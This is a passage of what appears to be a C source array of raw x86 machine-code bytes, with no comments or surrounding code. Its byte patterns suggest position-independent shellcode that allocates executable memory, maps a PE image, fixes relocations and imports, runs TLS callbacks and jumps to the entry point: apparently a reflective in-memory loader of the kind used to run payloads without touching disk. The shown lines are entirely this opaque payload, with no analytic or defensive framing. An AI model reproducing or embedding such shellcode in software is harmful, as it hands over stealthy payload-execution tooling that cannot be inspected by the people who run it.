354 0x00, 0x00, 0x83, 0x64, 0x24, 0x1c, 0x00, 0x8b, 0x86, 0x24, 0x05, 0x00,
355 0x00, 0x89, 0x44, 0x24, 0x18, 0x8d, 0x44, 0x24, 0x18, 0x50, 0x6a, 0x01,
356 0x6a, 0x11, 0xff, 0x53, 0x6c, 0x8b, 0xf8, 0x85, 0xff, 0x74, 0x60, 0x8b,
357 0x57, 0x0c, 0x33, 0xc9, 0x39, 0x8e, 0x24, 0x05, 0x00, 0x00, 0x76, 0x13,
358 0x8a, 0x84, 0x0e, 0x28, 0x05, 0x00, 0x00, 0x88, 0x04, 0x0a, 0x41, 0x3b,
359 0x8e, 0x24, 0x05, 0x00, 0x00, 0x72, 0xed, 0x8b, 0x4d, 0x10, 0x8d, 0x45,
360 0x14, 0x50, 0x57, 0x51, 0x8b, 0x11, 0xff, 0x92, 0xb4, 0x00, 0x00, 0x00,
361 0xf7, 0xd8, 0x1b, 0xc0, 0x33, 0xd2, 0x40, 0x8b, 0xca, 0x89, 0x44, 0x24,
362 0x10, 0x8b, 0x47, 0x0c, 0x39, 0x96, 0x24, 0x05, 0x00, 0x00, 0x76, 0x13,
363 0x88, 0x94, 0x0e, 0x28, 0x05, 0x00, 0x00, 0x88, 0x14, 0x08, 0x41, 0x3b,
364 0x8e, 0x24, 0x05, 0x00, 0x00, 0x72, 0xed, 0x57, 0xff, 0x53, 0x78, 0x8b,
365 0x44, 0x24, 0x10, 0x5f, 0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0x10, 0x02, 0x00,
366 0x00, 0xc3, 0x81, 0xec, 0x3c, 0x01, 0x00, 0x00, 0x53, 0x55, 0x56, 0x8b,
367 0xb4, 0x24, 0x4c, 0x01, 0x00, 0x00, 0x57, 0xff, 0x76, 0x2c, 0xff, 0x76,
368 0x28, 0xff, 0x76, 0x4c, 0xff, 0x76, 0x48, 0x56, 0xe8, 0xc2, 0x0f, 0x00,
369 0x00, 0xff, 0x76, 0x2c, 0x8b, 0xe8, 0xff, 0x76, 0x28, 0x89, 0x6c, 0x24,
370 0x34, 0xff, 0x76, 0x54, 0xff, 0x76, 0x50, 0x56, 0xe8, 0xaa, 0x0f, 0x00,
371 0x00, 0xff, 0x76, 0x2c, 0x8b, 0xd8, 0xff, 0x76, 0x28, 0x89, 0x5c, 0x24,
372 0x44, 0xff, 0xb6, 0x8c, 0x01, 0x00, 0x00, 0xff, 0xb6, 0x88, 0x01, 0x00,
373 0x00, 0x56, 0xe8, 0x8c, 0x0f, 0x00, 0x00, 0x83, 0xc4, 0x3c, 0x8b, 0xf8,
374 0x89, 0x7c, 0x24, 0x10, 0x85, 0xed, 0x74, 0x27, 0x85, 0xdb, 0x74, 0x23,
375 0x85, 0xff, 0x74, 0x1f, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00, 0xff,
376 0x36, 0x6a, 0x00, 0xff, 0xd5, 0x8b, 0xd8, 0x85, 0xdb, 0x75, 0x1a, 0x83,
377 0xbe, 0x30, 0x02, 0x00, 0x00, 0x02, 0x75, 0x03, 0x50, 0xff, 0xd7, 0x83,
378 0xc8, 0xff, 0x5f, 0x5e, 0x5d, 0x5b, 0x81, 0xc4, 0x3c, 0x01, 0x00, 0x00,
379 0xc3, 0xff, 0x36, 0x56, 0x53, 0xe8, 0xa4, 0x13, 0x00, 0x00, 0x6a, 0x20,
380 0x8d, 0x44, 0x24, 0x38, 0x6a, 0x00, 0x50, 0xe8, 0xba, 0x13, 0x00, 0x00,
381 0x83, 0xc4, 0x18, 0x83, 0xbb, 0x34, 0x02, 0x00, 0x00, 0x03, 0x75, 0x49,
382 0x8b, 0x03, 0x2d, 0x40, 0x02, 0x00, 0x00, 0x50, 0x8d, 0x83, 0x40, 0x02,
383 0x00, 0x00, 0x50, 0x8d, 0x43, 0x14, 0x50, 0x8d, 0x43, 0x04, 0x50, 0xe8,
384 0x73, 0x10, 0x00, 0x00, 0xff, 0x73, 0x2c, 0x8d, 0x83, 0xf0, 0x07, 0x00,
385 0x00, 0xff, 0x73, 0x28, 0x50, 0xe8, 0x3c, 0x0f, 0x00, 0x00, 0x83, 0xc4,
386 0x1c, 0x3b, 0x83, 0xf0, 0x08, 0x00, 0x00, 0x0f, 0x85, 0x7d, 0x02, 0x00,
387 0x00, 0x3b, 0x93, 0xf4, 0x08, 0x00, 0x00, 0x0f, 0x85, 0x71, 0x02, 0x00,
388 0x00, 0xff, 0x73, 0x2c, 0xff, 0x73, 0x28, 0xff, 0x73, 0x34, 0xff, 0x73,
389 0x30, 0x53, 0xe8, 0xcc, 0x0e, 0x00, 0x00, 0x83, 0xc4, 0x14, 0x89, 0x43,
390 0x30, 0x85, 0xc0, 0x0f, 0x84, 0x66, 0xff, 0xff, 0xff, 0x8d, 0xb3, 0x44,
391 0x02, 0x00, 0x00, 0x8a, 0x0e, 0x33, 0xc0, 0x84, 0xc9, 0x74, 0x35, 0x8d,
392 0x7c, 0x24, 0x48, 0x8b, 0xd6, 0x2b, 0xfe, 0x80, 0xf9, 0x3b, 0x74, 0x12,
393 0x3d, 0x04, 0x01, 0x00, 0x00, 0x73, 0x0b, 0x88, 0x0c, 0x3a, 0x40, 0x42,
394 0x8a, 0x0a, 0x84, 0xc9, 0x75, 0xe9, 0x85, 0xc0, 0x74, 0x12, 0x46, 0xc6,
395 0x44, 0x04, 0x48, 0x00, 0x03, 0xf0, 0x8d, 0x44, 0x24, 0x48, 0x50, 0xff,
396 0x53, 0x30, 0xeb, 0xc3, 0x33, 0xff, 0x47, 0x39, 0xbb, 0x40, 0x02, 0x00,
397 0x00, 0x76, 0x38, 0x8d, 0x6b, 0x34, 0x8d, 0x73, 0x38, 0xff, 0x73, 0x2c,
398 0xff, 0x73, 0x28, 0xff, 0x76, 0x04, 0xff, 0x36, 0x53, 0xe8, 0x59, 0x0e,
399 0x00, 0x00, 0x83, 0xc4, 0x14, 0x89, 0x45, 0x00, 0x85, 0xc0, 0x0f, 0x84,
400 0xda, 0x01, 0x00, 0x00, 0x47, 0x83, 0xc6, 0x08, 0x83, 0xc5, 0x04, 0x3b,
401 0xbb, 0x40, 0x02, 0x00, 0x00, 0x72, 0xd2, 0x8b, 0x6c, 0x24, 0x18, 0x8b,
402 0x83, 0xe4, 0x06, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x75, 0x17, 0x53, 0xe8,
403 0x53, 0xf3, 0xff, 0xff, 0x59, 0x85, 0xc0, 0x0f, 0x84, 0xad, 0x01, 0x00,
404 0x00, 0x8b, 0xb3, 0x20, 0x09, 0x00, 0x00, 0xeb, 0x18, 0x83, 0xf8, 0x03,
405 0x0f, 0x84, 0x9c, 0x01, 0x00, 0x00, 0x8d, 0xb3, 0x20, 0x09, 0x00, 0x00,
406 0x83, 0xf8, 0x01, 0x74, 0x04, 0x8b, 0x74, 0x24, 0x1c, 0x83, 0xbb, 0x6c,
407 0x05, 0x00, 0x00, 0x01, 0x74, 0x30, 0x53, 0xe8, 0x4f, 0xf1, 0xff, 0xff,
408 0x59, 0x85, 0xc0, 0x75, 0x0d, 0x83, 0xbb, 0x6c, 0x05, 0x00, 0x00, 0x02,
409 0x0f, 0x84, 0x6c, 0x01, 0x00, 0x00, 0x53, 0xe8, 0x1d, 0xf2, 0xff, 0xff,
410 0x59, 0x85, 0xc0, 0x75, 0x0d, 0x83, 0xbb, 0x6c, 0x05, 0x00, 0x00, 0x02,
411 0x0f, 0x84, 0x54, 0x01, 0x00, 0x00, 0x83, 0x7e, 0x08, 0x01, 0x0f, 0x84,
412 0xeb, 0x00, 0x00, 0x00, 0x8b, 0x86, 0x24, 0x05, 0x00, 0x00, 0xbf, 0x30,
413 0x05, 0x00, 0x00, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00, 0x03, 0xc7,
414 0x50, 0x6a, 0x00, 0xff, 0xd5, 0x8b, 0xe8, 0x85, 0xed, 0x0f, 0x84, 0x27,
415 0x01, 0x00, 0x00, 0x57, 0x56, 0x55, 0xe8, 0xf3, 0x11, 0x00, 0x00, 0x8b,
416 0x46, 0x08, 0x83, 0xc4, 0x0c, 0x83, 0xf8, 0x03, 0x74, 0x2d, 0x83, 0xf8,
417 0x04, 0x74, 0x28, 0x83, 0xf8, 0x05, 0x74, 0x23, 0x83, 0xf8, 0x02, 0x0f,
418 0x85, 0xa2, 0x00, 0x00, 0x00, 0x8d, 0x85, 0x28, 0x05, 0x00, 0x00, 0x50,
419 0x8d, 0x86, 0x28, 0x05, 0x00, 0x00, 0x50, 0xe8, 0xc8, 0x0f, 0x00, 0x00,
420 0x59, 0x59, 0xe9, 0x86, 0x00, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x20, 0xb9,
421 0x00, 0x01, 0x00, 0x00, 0x50, 0x8d, 0x44, 0x24, 0x20, 0x50, 0x66, 0x8b,
422 0x46, 0x08, 0x66, 0x48, 0x66, 0x0b, 0xc1, 0x0f, 0xb7, 0xc0, 0x50, 0xff,
423 0x93, 0xe4, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x0f, 0x85, 0xbd, 0x00, 0x00,
424 0x00, 0x6a, 0x04, 0x68, 0x00, 0x30, 0x00, 0x00, 0xff, 0x74, 0x24, 0x24,
425 0x50, 0xff, 0x54, 0x24, 0x28, 0x8b, 0xf8, 0x8d, 0x8e, 0x28, 0x05, 0x00,
426 0x00, 0x57, 0x8d, 0x44, 0x24, 0x28, 0x50, 0xff, 0xb6, 0x20, 0x05, 0x00,
427 0x00, 0x66, 0x8b, 0x46, 0x08, 0x51, 0xff, 0xb6, 0x24, 0x05, 0x00, 0x00,
428 0x8d, 0x8d, 0x28, 0x05, 0x00, 0x00, 0x66, 0x48, 0x51, 0xb9, 0x00, 0x01,
429 0x00, 0x00, 0x66, 0x0b, 0xc1, 0x0f, 0xb7, 0xc0, 0x50, 0xff, 0x93, 0xe8,
430 0x00, 0x00, 0x00, 0x68, 0x00, 0xc0, 0x00, 0x00, 0x6a, 0x00, 0x57, 0x8b,
431 0xf0, 0xff, 0x54, 0x24, 0x20, 0x85, 0xf6, 0x75, 0x61, 0x8b, 0xf5, 0x83,
432 0x3e, 0x03, 0x74, 0x51, 0x83, 0x3e, 0x04, 0x74, 0x4c, 0x83, 0x3e, 0x01,
433 0x74, 0x18, 0x83, 0x3e, 0x02, 0x74, 0x13, 0x83, 0x3e, 0x05, 0x74, 0x05,
434 0x83, 0x3e, 0x06, 0x75, 0x41, 0x56, 0x53, 0xe8, 0x1f, 0x08, 0x00, 0x00,
435 0xeb, 0x36, 0x8d, 0x44, 0x24, 0x28, 0x50, 0x56, 0x53, 0xe8, 0xc6, 0xfa,
436 0xff, 0xff, 0x83, 0xc4, 0x0c, 0x85, 0xc0, 0x74, 0x0f, 0x8d, 0x44, 0x24,
437 0x28, 0x50, 0x56, 0x53, 0xe8, 0x8f, 0x00, 0x00, 0x00, 0x83, 0xc4, 0x0c,
438 0x8d, 0x44, 0x24, 0x28, 0x50, 0x53, 0xe8, 0x7d, 0xf5, 0xff, 0xff, 0xeb,
439 0x07, 0x56, 0x53, 0xe8, 0xa6, 0x03, 0x00, 0x00, 0x59, 0x59, 0x8b, 0x7c,
440 0x24, 0x10, 0x8b, 0x83, 0xe4, 0x06, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x74,
441 0x05, 0x83, 0xf8, 0x03, 0x75, 0x33, 0x8b, 0x83, 0x20, 0x09, 0x00, 0x00,
442 0x85, 0xc0, 0x74, 0x29, 0xff, 0xb3, 0x18, 0x09, 0x00, 0x00, 0x6a, 0x00,
443 0x50, 0xe8, 0xcc, 0x10, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x68, 0x00, 0xc0,
444 0x00, 0x00, 0x6a, 0x00, 0xff, 0xb3, 0x20, 0x09, 0x00, 0x00, 0xff, 0x54,
445 0x24, 0x20, 0x83, 0xa3, 0x20, 0x09, 0x00, 0x00, 0x00, 0xff, 0x33, 0x8b,
446 0xb3, 0x30, 0x02, 0x00, 0x00, 0x6a, 0x00, 0x53, 0xe8, 0xa1, 0x10, 0x00,
447 0x00, 0x83, 0xc4, 0x0c, 0x68, 0x00, 0xc0, 0x00, 0x00, 0x6a, 0x00, 0x53,
448 0xff, 0x54, 0x24, 0x20, 0x83, 0xfe, 0x02, 0x75, 0x04, 0x6a, 0x00, 0xff,
449 0xd7, 0x33, 0xc0, 0xe9, 0xa6, 0xfc, 0xff, 0xff, 0x81, 0xec, 0x78, 0x02,
450 0x00, 0x00, 0x53, 0x55, 0x56, 0x8b, 0xb4, 0x24, 0x8c, 0x02, 0x00, 0x00,
451 0x33, 0xc0, 0x57, 0x8d, 0x7c, 0x24, 0x44, 0x33, 0xed, 0x21, 0x6c, 0x24,
452 0x1c, 0xab, 0xab, 0xab, 0xab, 0x33, 0xc0, 0x83, 0x3e, 0x02, 0x66, 0x89,
453 0x44, 0x24, 0x18, 0x0f, 0x85, 0x7e, 0x01, 0x00, 0x00, 0x8b, 0x84, 0x24,
454 0x94, 0x02, 0x00, 0x00, 0x8b, 0x48, 0x14, 0x8d, 0x78, 0x1c, 0x57, 0x51,
455 0x8b, 0x01, 0xff, 0x50, 0x40, 0x85, 0xc0, 0x0f, 0x88, 0x5b, 0x01, 0x00,
456 0x00, 0x8b, 0x07, 0x8d, 0x54, 0x24, 0x1c, 0x52, 0x50, 0x8b, 0x08, 0xff,
457 0x51, 0x48, 0x85, 0xc0, 0x0f, 0x88, 0xbe, 0x02, 0x00, 0x00, 0x8b, 0x9c,
458 0x24, 0x8c, 0x02, 0x00, 0x00, 0x8d, 0x44, 0x24, 0x2c, 0x50, 0x6a, 0x01,
459 0xff, 0x74, 0x24, 0x24, 0xff, 0x53, 0x7c, 0x8d, 0x44, 0x24, 0x28, 0x50,
460 0x6a, 0x01, 0xff, 0x74, 0x24, 0x24, 0xff, 0x93, 0x80, 0x00, 0x00, 0x00,
461 0x8b, 0x44, 0x24, 0x28, 0x2b, 0x44, 0x24, 0x2c, 0x83, 0xc0, 0x01, 0x0f,
462 0x84, 0xcc, 0x00, 0x00, 0x00, 0x6a, 0x01, 0x55, 0x6a, 0x0c, 0xff, 0x53,
463 0x70, 0x81, 0xc6, 0x0c, 0x04, 0x00, 0x00, 0x8b, 0xe8, 0x80, 0x3e, 0x00,
464 0x74, 0x70, 0x8d, 0x84, 0x24, 0x84, 0x00, 0x00, 0x00, 0x50, 0x56, 0x53,
465 0xe8, 0x19, 0x0b, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x14,
466 0x50, 0x8d, 0x84, 0x24, 0x88, 0x00, 0x00, 0x00, 0x50, 0xff, 0x53, 0x68,
467 0xff, 0x74, 0x24, 0x14, 0x8b, 0xf0, 0xb8, 0x08, 0x20, 0x00, 0x00, 0x6a,
468 0x00, 0x6a, 0x08, 0x66, 0x89, 0x44, 0x24, 0x40, 0xff, 0x53, 0x70, 0x33,
469 0xc9, 0x89, 0x44, 0x24, 0x3c, 0x89, 0x4c, 0x24, 0x10, 0x39, 0x4c, 0x24,
470 0x14, 0x76, 0x5b, 0xff, 0x34, 0x8e, 0xff, 0x93, 0x84, 0x00, 0x00, 0x00,
471 0x50, 0x8d, 0x44, 0x24, 0x14, 0x50, 0xff, 0x74, 0x24, 0x44, 0xff, 0x53,
472 0x74, 0x8b, 0x4c, 0x24, 0x10, 0x41, 0x89, 0x4c, 0x24, 0x10, 0x3b, 0x4c,
473 0x24, 0x14, 0x72, 0xdb, 0xeb, 0x34, 0x6a, 0x01, 0x6a, 0x00, 0xb8, 0x08,
474 0x20, 0x00, 0x00, 0x6a, 0x08, 0x66, 0x89, 0x44, 0x24, 0x40, 0xff, 0x53,
475 0x70, 0x83, 0x64, 0x24, 0x10, 0x00, 0x89, 0x44, 0x24, 0x3c, 0x8d, 0x44,
476 0x24, 0x18, 0x50, 0xff, 0x93, 0x84, 0x00, 0x00, 0x00, 0x50, 0x8d, 0x44,
477 0x24, 0x14, 0x50, 0xff, 0x74, 0x24, 0x44, 0xff, 0x53, 0x74, 0x83, 0x64,
478 0x24, 0x10, 0x00, 0x8d, 0x44, 0x24, 0x34, 0x50, 0x8d, 0x44, 0x24, 0x14,
479 0x50, 0x55, 0xff, 0x53, 0x74, 0x83, 0x64, 0x24, 0x4c, 0x00, 0x8d, 0x54,
480 0x24, 0x64, 0x52, 0x33, 0xc0, 0x8d, 0x74, 0x24, 0x48, 0x40, 0x66, 0x89,
481 0x44, 0x24, 0x48, 0x8b, 0x07, 0x55, 0x83, 0xec, 0x10, 0x8b, 0xfc, 0x8b,
482 0x08, 0x50, 0xa5, 0xa5, 0xa5, 0xa5, 0xff, 0x91, 0x94, 0x00, 0x00, 0x00,
483 0x85, 0xed, 0x0f, 0x84, 0x88, 0x01, 0x00, 0x00, 0xff, 0x74, 0x24, 0x3c,
484 0xff, 0x53, 0x78, 0x55, 0xff, 0x53, 0x78, 0xe9, 0x78, 0x01, 0x00, 0x00,
485 0x21, 0x2f, 0xe9, 0x71, 0x01, 0x00, 0x00, 0x8b, 0x9c, 0x24, 0x8c, 0x02,
486 0x00, 0x00, 0x8d, 0x84, 0x24, 0x84, 0x00, 0x00, 0x00, 0x50, 0x8d, 0x86,
487 0x0c, 0x02, 0x00, 0x00, 0x50, 0x53, 0xe8, 0x0b, 0x0a, 0x00, 0x00, 0x83,
488 0xc4, 0x0c, 0x8d, 0x84, 0x24, 0x84, 0x00, 0x00, 0x00, 0x50, 0xff, 0x93,
489 0x84, 0x00, 0x00, 0x00, 0x8b, 0xe8, 0x89, 0x6c, 0x24, 0x20, 0x85, 0xed,
490 0x0f, 0x84, 0x39, 0x01, 0x00, 0x00, 0x8d, 0x84, 0x24, 0x84, 0x00, 0x00,
491 0x00, 0x50, 0x8d, 0x86, 0x0c, 0x03, 0x00, 0x00, 0x50, 0x53, 0xe8, 0xd7,
492 0x09, 0x00, 0x00, 0x83, 0xc4, 0x0c, 0x8d, 0x84, 0x24, 0x84, 0x00, 0x00,
493 0x00, 0x50, 0xff, 0x93, 0x84, 0x00, 0x00, 0x00, 0x89, 0x44, 0x24, 0x24,
494 0x85, 0xc0, 0x0f, 0x84, 0xfd, 0x00, 0x00, 0x00, 0x8b, 0x8c, 0x24, 0x94,
495 0x02, 0x00, 0x00, 0x8b, 0x51, 0x14, 0x8d, 0x41, 0x18, 0x50, 0x55, 0x52,
496 0x8b, 0x0a, 0x89, 0x44, 0x24, 0x3c, 0xff, 0x51, 0x44, 0x8b, 0xf8, 0x85,
497 0xff, 0x0f, 0x88, 0xcf, 0x00, 0x00, 0x00, 0x81, 0xc6, 0x0c, 0x04, 0x00,
498 0x00, 0x33, 0xed, 0x80, 0x3e, 0x00, 0x74, 0x7e, 0x8d, 0x84, 0x24, 0x84,
499 0x00, 0x00, 0x00, 0x50, 0x56, 0x53, 0xe8, 0x7b, 0x09, 0x00, 0x00, 0x83,
500 0xc4, 0x0c, 0x8d, 0x44, 0x24, 0x14, 0x50, 0x8d, 0x84, 0x24, 0x88, 0x00,
501 0x00, 0x00, 0x50, 0xff, 0x53, 0x68, 0xff, 0x74, 0x24, 0x14, 0x8b, 0xf0,
502 0x55, 0x6a, 0x0c, 0xff, 0x53, 0x70, 0x8b, 0xe8, 0x85, 0xed, 0x74, 0x4a,
503 0x33, 0xc9, 0x89, 0x4c, 0x24, 0x10, 0x39, 0x4c, 0x24, 0x14, 0x76, 0x3e,
504 0xff, 0x34, 0x8e, 0xff, 0x93, 0x84, 0x00, 0x00, 0x00, 0x6a, 0x08, 0x89,
505 0x44, 0x24, 0x60, 0x58, 0x66, 0x89, 0x44, 0x24, 0x54, 0x8d, 0x44, 0x24,
506 0x54, 0x50, 0x8d, 0x44, 0x24, 0x14, 0x50, 0x55, 0xff, 0x53, 0x74, 0x8b,
507 0xf8, 0x85, 0xff, 0x79, 0x06, 0x55, 0xff, 0x53, 0x78, 0x33, 0xed, 0x8b,
508 0x4c, 0x24, 0x10, 0x41, 0x89, 0x4c, 0x24, 0x10, 0x3b, 0x4c, 0x24, 0x14,
509 0x72, 0xc2, 0x85, 0xff, 0x78, 0x3c, 0x8b, 0x44, 0x24, 0x30, 0x8d, 0x54,
510 0x24, 0x74, 0x52, 0x55, 0x83, 0xec, 0x10, 0x8d, 0x74, 0x24, 0x5c, 0x8b,
511 0x00, 0x8b, 0xfc, 0x6a, 0x00, 0x8b, 0x08, 0xa5, 0x68, 0x18, 0x01, 0x00,
512 0x00, 0xa5, 0xa5, 0xa5, 0x8b, 0x74, 0x24, 0x44, 0x56, 0x50, 0xff, 0x91,
513 0xe4, 0x00, 0x00, 0x00, 0x85, 0xed, 0x74, 0x04, 0x55, 0xff, 0x53, 0x78,
514 0x8b, 0x6c, 0x24, 0x20, 0xeb, 0x08, 0x8b, 0x6c, 0x24, 0x20, 0x8b, 0x74,
515 0x24, 0x24, 0x56, 0xff, 0x93, 0x88, 0x00, 0x00, 0x00, 0x55, 0xff, 0x93,
516 0x88, 0x00, 0x00, 0x00, 0x33, 0xc0, 0x40, 0x5f, 0x5e, 0x5d, 0x5b, 0x81,
517 0xc4, 0x78, 0x02, 0x00, 0x00, 0xc3, 0x81, 0xec, 0x24, 0x02, 0x00, 0x00,
518 0x53, 0x8b, 0x9c, 0x24, 0x2c, 0x02, 0x00, 0x00, 0x33, 0xc0, 0x55, 0x8b,
519 0xac, 0x24, 0x34, 0x02, 0x00, 0x00, 0x81, 0xc5, 0x28, 0x05, 0x00, 0x00,
520 0x89, 0x44, 0x24, 0x1c, 0x57, 0x50, 0x89, 0x6c, 0x24, 0x28, 0x8b, 0x7d,
521 0x3c, 0x03, 0xfd, 0x89, 0x7c, 0x24, 0x20, 0xff, 0x53, 0x38, 0x66, 0x8b,
522 0x4f, 0x04, 0x89, 0x44, 0x24, 0x28, 0x8b, 0x50, 0x3c, 0x66, 0x3b, 0x4c,
523 0x02, 0x04, 0x0f, 0x85, 0xed, 0x03, 0x00, 0x00, 0x8b, 0x4f, 0x50, 0xb8,
524 0x00, 0x30, 0x00, 0x00, 0x56, 0x6a, 0x40, 0x50, 0x89, 0x44, 0x24, 0x1c,
525 0xb8, 0x00, 0x10, 0x00, 0x00, 0x03, 0xc8, 0x51, 0x6a, 0x00, 0xff, 0x53,
526 0x3c, 0x8b, 0xf0, 0x85, 0xf6, 0x0f, 0x84, 0xc5, 0x03, 0x00, 0x00, 0xff,
527 0x77, 0x54, 0x55, 0x56, 0xe8, 0xb5, 0x0c, 0x00, 0x00, 0x0f, 0xb7, 0x6f,
528 0x14, 0x33, 0xc0, 0x83, 0x64, 0x24, 0x1c, 0x00, 0x83, 0xc4, 0x0c, 0x83,
529 0xc5, 0x2c, 0x66, 0x3b, 0x47, 0x06, 0x73, 0x32, 0x8b, 0x5c, 0x24, 0x10,
530 0x03, 0xef, 0xff, 0x75, 0xfc, 0x8b, 0x45, 0x00, 0x03, 0x44, 0x24, 0x2c,
531 0x50, 0x8b, 0x45, 0xf8, 0x03, 0xc6, 0x50, 0xe8, 0x82, 0x0c, 0x00, 0x00,
532 0x0f, 0xb7, 0x47, 0x06, 0x8d, 0x6d, 0x28, 0x83, 0xc4, 0x0c, 0x43, 0x3b,
533 0xd8, 0x72, 0xdb, 0x8b, 0x9c, 0x24, 0x38, 0x02, 0x00, 0x00, 0x8b, 0x87,
534 0xa0, 0x00, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x76, 0x8d, 0x2c, 0x30, 0x8b,
535 0xc6, 0x2b, 0x47, 0x34, 0x83, 0x7d, 0x00, 0x00, 0x89, 0x44, 0x24, 0x10,
536 0x74, 0x64, 0x8d, 0x4d, 0x08, 0xeb, 0x4b, 0x0f, 0xb7, 0x01, 0x8b, 0xd0,
537 0x25, 0x00, 0xf0, 0x00, 0x00, 0x89, 0x54, 0x24, 0x18, 0x66, 0x3b, 0x44,
538 0x24, 0x14, 0x75, 0x25, 0x8b, 0xc2, 0x25, 0xff, 0x0f, 0x00, 0x00, 0x89,
539 0x44, 0x24, 0x18, 0x03, 0x45, 0x00, 0x8b, 0x0c, 0x30, 0x03, 0x4c, 0x24,
540 0x10, 0x8b, 0x44, 0x24, 0x18, 0x03, 0x45, 0x00, 0x89, 0x0c, 0x30, 0x8b,
541 0x4c, 0x24, 0x1c, 0xeb, 0x0e, 0xb8, 0x00, 0x10, 0x00, 0x00, 0x66, 0x3b,
542 0xd0, 0x0f, 0x83, 0xfe, 0x02, 0x00, 0x00, 0x83, 0xc1, 0x02, 0x8b, 0x45,
543 0x04, 0x03, 0xc5, 0x89, 0x4c, 0x24, 0x1c, 0x3b, 0xc8, 0x75, 0xa8, 0x83,
544 0x39, 0x00, 0x8b, 0xe9, 0x75, 0x9c, 0x8b, 0x87, 0x80, 0x00, 0x00, 0x00,
545 0x85, 0xc0, 0x0f, 0x84, 0xa5, 0x00, 0x00, 0x00, 0x8d, 0x2c, 0x30, 0x8b,
546 0x45, 0x0c, 0x89, 0x6c, 0x24, 0x10, 0x85, 0xc0, 0x0f, 0x84, 0x93, 0x00,
547 0x00, 0x00, 0x8b, 0xbc, 0x24, 0x3c, 0x02, 0x00, 0x00, 0x03, 0xc6, 0x50,
548 0xff, 0x53, 0x30, 0x8b, 0x55, 0x10, 0x89, 0x44, 0x24, 0x1c, 0x03, 0xd6,
549 0x8b, 0x45, 0x00, 0x03, 0xc6, 0x89, 0x54, 0x24, 0x14, 0x89, 0x44, 0x24,
550 0x18, 0x8b, 0x08, 0x85, 0xc9, 0x74, 0x54, 0x8b, 0xea, 0x79, 0x05, 0x0f,
551 0xb7, 0xc1, 0xeb, 0x28, 0x8d, 0x46, 0x02, 0x03, 0xc1, 0x83, 0x7f, 0x04,
552 0x00, 0x89, 0x44, 0x24, 0x14, 0x74, 0x19, 0x50, 0x53, 0xe8, 0xa8, 0xf4,
553 0xff, 0xff, 0x59, 0x59, 0x85, 0xc0, 0x74, 0x08, 0x8b, 0x83, 0xd8, 0x00,
554 0x00, 0x00, 0xeb, 0x0c, 0x8b, 0x44, 0x24, 0x14, 0x50, 0xff, 0x74, 0x24,
555 0x20, 0xff, 0x53, 0x34, 0x89, 0x45, 0x00, 0x83, 0xc5, 0x04, 0x8b, 0x44,
556 0x24, 0x18, 0x83, 0xc0, 0x04, 0x89, 0x44, 0x24, 0x18, 0x8b, 0x08, 0x85,
557 0xc9, 0x75, 0xb2, 0x8b, 0x6c, 0x24, 0x10, 0x8b, 0x45, 0x20, 0x83, 0xc5,
558 0x14, 0x89, 0x6c, 0x24, 0x10, 0x85, 0xc0, 0x0f, 0x85, 0x78, 0xff, 0xff,
559 0xff, 0x8b, 0x7c, 0x24, 0x20, 0x8b, 0x87, 0xe0, 0x00, 0x00, 0x00, 0x85,
560 0xc0, 0x74, 0x77, 0x8d, 0x6e, 0x04, 0x03, 0xe8, 0x89, 0x6c, 0x24, 0x1c,
561 0x8b, 0x45, 0x00, 0x85, 0xc0, 0x74, 0x67, 0x03, 0xc6, 0x50, 0xff, 0x53,
562 0x30, 0x89, 0x44, 0x24, 0x10, 0x85, 0xc0, 0x74, 0x47, 0x8b, 0x4d, 0x0c,
563 0x8b, 0x55, 0x08, 0x03, 0xce, 0x03, 0xd6, 0x89, 0x4c, 0x24, 0x14, 0x89,
564 0x54, 0x24, 0x18, 0x8b, 0x01, 0x85, 0xc0, 0x74, 0x2f, 0x8b, 0xf9, 0x8b,
565 0xea, 0x8b, 0x4b, 0x34, 0x85, 0xc0, 0x79, 0x05, 0x0f, 0xb7, 0xc0, 0xeb,
566 0x05, 0x83, 0xc0, 0x02, 0x03, 0xc6, 0x50, 0xff, 0x74, 0x24, 0x14, 0xff,
567 0xd1, 0x83, 0xc7, 0x04, 0x89, 0x45, 0x00, 0x83, 0xc5, 0x04, 0x8b, 0x07,
568 0x85, 0xc0, 0x75, 0xd9, 0x8b, 0x6c, 0x24, 0x1c, 0x83, 0xc5, 0x20, 0x89,
569 0x6c, 0x24, 0x1c, 0x8b, 0x45, 0x00, 0x85, 0xc0, 0x75, 0x9d, 0x8b, 0x7c,
570 0x24, 0x20, 0x8b, 0xaf, 0xc0, 0x00, 0x00, 0x00, 0x85, 0xed, 0x74, 0x1b,
571 0x8b, 0x6c, 0x2e, 0x0c, 0x85, 0xed, 0x74, 0x13, 0xeb, 0x0a, 0x6a, 0x00,
572 0x6a, 0x01, 0x56, 0xff, 0xd0, 0x8d, 0x6d, 0x04, 0x8b, 0x45, 0x00, 0x85,
573 0xc0, 0x75, 0xef, 0x8b, 0x84, 0x24, 0x3c, 0x02, 0x00, 0x00, 0x8b, 0x6f,
574 0x28, 0x03, 0xee, 0x83, 0x38, 0x03, 0x0f, 0x85, 0x0b, 0x01, 0x00, 0x00,
575 0x6a, 0x00, 0x6a, 0x01, 0xff, 0x74, 0x24, 0x34, 0xff, 0xd5, 0x8b, 0x94,
576 0x24, 0x3c, 0x02, 0x00, 0x00, 0x81, 0xc2, 0x0c, 0x03, 0x00, 0x00, 0x89,
577 0x54, 0x24, 0x2c, 0x80, 0x3a, 0x00, 0x0f, 0x84, 0x55, 0x01, 0x00, 0x00,
578 0x8b, 0x4f, 0x78, 0x85, 0xc9, 0x0f, 0x84, 0x4a, 0x01, 0x00, 0x00, 0x8b,
579 0x6c, 0x31, 0x18, 0x85, 0xed, 0x0f, 0x84, 0x3e, 0x01, 0x00, 0x00, 0x8b,
580 0x44, 0x31, 0x1c, 0x03, 0xc6, 0x89, 0x44, 0x24, 0x10, 0x8b, 0x44, 0x31,
581 0x20, 0x8b, 0x4c, 0x31, 0x24, 0x03, 0xc6, 0x03, 0xce, 0x89, 0x4c, 0x24,
